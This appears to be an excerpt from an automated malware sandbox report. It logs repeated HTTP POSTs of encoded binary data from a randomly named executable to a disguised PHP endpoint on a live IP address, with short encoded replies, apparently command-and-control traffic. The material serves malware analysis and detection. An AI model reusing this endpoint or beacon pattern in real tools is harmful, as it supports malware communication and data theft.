Nov 21, 2023 04:48:28.185298920 CET	532	OUT	Data Raw: 52 5d 58 5b 5b 5f 5a 5b 5d 57 55 57 55 5e 57 53 50 5d 58 46 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]X[[_Z[]WUWU^WSP]XFVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=*?&W>308)"95Y(0&R$.!33:W,;X<,;X;>&G''^)
Nov 21, 2023 04:48:28.386883974 CET	532	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.5	49807	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:27.988404036 CET	529	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:28.185064077 CET	529	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:28.185298920 CET	532	OUT	Data Raw: 52 5d 58 5b 5b 5f 5a 5b 5d 57 55 57 55 5e 57 53 50 5d 58 46 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]X[[_Z[]WUWU^WSP]XFVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=*?&W>308)"95Y(0&R$.!33:W,;X<,;X;>&G''^)
Nov 21, 2023 04:48:28.386883974 CET	532	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.5	49808	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:28.395704985 CET	533	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:28.592679977 CET	534	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:28.592916012 CET	535	OUT	Data Raw: 57 50 5d 5b 5b 5a 5a 5a 5d 57 55 57 55 5c 57 5a 50 52 58 40 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP][[ZZZ]WUWU\WZPRX@V_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8Y+2*#7[/B.^4\5(#.W3"S'02::\+?7,&G''^)/
Nov 21, 2023 04:48:28.794825077 CET	538	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:28 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 01 32 06 27 03 37 30 3f 52 29 3a 2a 0e 2e 00 00 44 3f 23 00 07 32 3e 38 13 30 39 03 50 3d 3f 38 5c 30 2a 2f 0e 21 26 38 11 2b 30 21 5a 0c 1d 26 18 35 28 06 0c 3c 2e 20 13 3c 3e 28 5b 26 32 27 1a 2b 3d 34 0a 34 0a 30 02 24 23 20 1a 2f 3f 31 5e 2e 38 25 1c 32 2c 2a 10 20 2d 23 5f 0c 14 24 08 22 31 2f 5e 22 33 3e 55 21 37 38 16 23 27 2b 56 30 3d 30 50 32 01 2e 04 2b 28 20 55 32 09 2c 13 27 2a 37 56 32 39 2f 57 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !2'70?R):.D?#2>809P=?8\0/!&8+0!Z&5(<. <>([&2'+=440$# /?1^.8%2,* -#_$"1/^"3>U!78#'+V0=0P2.+( U2,'7V29/W<&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	77.91.124.101	80	192.168.2.5	49808	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:28.395704985 CET	533	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:28.592679977 CET	534	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:28.592916012 CET	535	OUT	Data Raw: 57 50 5d 5b 5b 5a 5a 5a 5d 57 55 57 55 5c 57 5a 50 52 58 40 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP][[ZZZ]WUWU\WZPRX@V_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8Y+2*#7[/B.^4\5(#.W3"S'02::\+?7,&G''^)/
Nov 21, 2023 04:48:28.794825077 CET	538	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:28 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 01 32 06 27 03 37 30 3f 52 29 3a 2a 0e 2e 00 00 44 3f 23 00 07 32 3e 38 13 30 39 03 50 3d 3f 38 5c 30 2a 2f 0e 21 26 38 11 2b 30 21 5a 0c 1d 26 18 35 28 06 0c 3c 2e 20 13 3c 3e 28 5b 26 32 27 1a 2b 3d 34 0a 34 0a 30 02 24 23 20 1a 2f 3f 31 5e 2e 38 25 1c 32 2c 2a 10 20 2d 23 5f 0c 14 24 08 22 31 2f 5e 22 33 3e 55 21 37 38 16 23 27 2b 56 30 3d 30 50 32 01 2e 04 2b 28 20 55 32 09 2c 13 27 2a 37 56 32 39 2f 57 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !2'70?R):.D?#2>809P=?8\0/!&8+0!Z&5(<. <>([&2'+=440$# /?1^.8%2,* -#_$"1/^"3>U!78#'+V0=0P2.+( U2,'7V29/W<&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	77.91.124.101	80	192.168.2.5	49809	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:28.519782066 CET	534	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:28.718663931 CET	535	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:28.718990088 CET	538	OUT	Data Raw: 52 5d 5d 5a 5b 5b 5a 59 5d 57 55 57 55 5b 57 56 50 58 58 42 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]Z[[ZY]WUWU[WVPXXBVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(%=(")3'_,'9#&) !'9&#9-+*_>/?8&G''^)3
Nov 21, 2023 04:48:28.922313929 CET	539	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.5	49809	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:28.519782066 CET	534	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:28.718663931 CET	535	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:28.718990088 CET	538	OUT	Data Raw: 52 5d 5d 5a 5b 5b 5a 59 5d 57 55 57 55 5b 57 56 50 58 58 42 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]Z[[ZY]WUWU[WVPXXBVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(%=(")3'_,'9#&) !'9&#9-+*_>/?8&G''^)3
Nov 21, 2023 04:48:28.922313929 CET	539	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.5	49810	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:29.236812115 CET	540	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:29.434954882 CET	540	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:29.435201883 CET	542	OUT	Data Raw: 52 5c 58 59 5b 5a 5a 5f 5d 57 55 57 55 5d 57 5a 50 5c 58 49 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\XY[ZZ_]WUWU]WZP\XIV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=)?+)=#;\,1#2)#&$-.09-*\(4;>&G''^)+
Nov 21, 2023 04:48:29.637830973 CET	543	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	77.91.124.101	80	192.168.2.5	49810	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:29.236812115 CET	540	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:29.434954882 CET	540	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:29.435201883 CET	542	OUT	Data Raw: 52 5c 58 59 5b 5a 5a 5f 5d 57 55 57 55 5d 57 5a 50 5c 58 49 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\XY[ZZ_]WUWU]WZP\XIV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=)?+)=#;\,1#2)#&$-.09-*\(4;>&G''^)+
Nov 21, 2023 04:48:29.637830973 CET	543	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.5	49811	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:29.957750082 CET	543	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:30.160639048 CET	544	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:30.160854101 CET	546	OUT	Data Raw: 52 5f 5d 5b 5b 5f 5f 5e 5d 57 55 57 55 5c 57 56 50 5a 58 44 56 5f 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_][[__^]WUWU\WVPZXDV_W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_>=^<=/B&_#1\<#*3&0T-)?,4;&G''^)/
Nov 21, 2023 04:48:30.369224072 CET	546	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	77.91.124.101	80	192.168.2.5	49811	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:29.957750082 CET	543	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:30.160639048 CET	544	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:30.160854101 CET	546	OUT	Data Raw: 52 5f 5d 5b 5b 5f 5f 5e 5d 57 55 57 55 5c 57 56 50 5a 58 44 56 5f 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_][[__^]WUWU\WVPZXDV_W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_>=^<=/B&_#1\<#*3&0T-)?,4;&G''^)/
Nov 21, 2023 04:48:30.369224072 CET	546	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.5	49812	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:30.689914942 CET	547	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:30.886128902 CET	547	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:30.886403084 CET	550	OUT	Data Raw: 52 5d 58 59 5b 5a 5a 59 5d 57 55 57 55 58 57 55 50 5f 58 48 56 5e 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]XY[ZZY]WUWUXWUP_XHV^WZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)=Z<]:T> 7];.Z7%X)#"'=W099%(Z#_/&G''^)?
Nov 21, 2023 04:48:31.087574005 CET	550	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	77.91.124.101	80	192.168.2.5	49812	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:30.689914942 CET	547	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:30.886128902 CET	547	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:30.886403084 CET	550	OUT	Data Raw: 52 5d 58 59 5b 5a 5a 59 5d 57 55 57 55 58 57 55 50 5f 58 48 56 5e 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]XY[ZZY]WUWUXWUP_XHV^WZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)=Z<]:T> 7];.Z7%X)#"'=W099%(Z#_/&G''^)?
Nov 21, 2023 04:48:31.087574005 CET	550	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.5	49813	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:31.409105062 CET	551	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:31.608257055 CET	551	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:31.608489990 CET	554	OUT	Data Raw: 52 5f 5d 5a 5b 52 5a 5c 5d 57 55 57 55 5b 57 52 50 5c 58 46 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_]Z[RZ\]WUWU[WRP\XFVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y=^=?;.R= ,["9"<#.R3-R009,+=??,&G''^)3
Nov 21, 2023 04:48:31.811938047 CET	554	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	77.91.124.101	80	192.168.2.5	49813	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:31.409105062 CET	551	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:31.608257055 CET	551	IN	HTTP/1.1 100 Continue
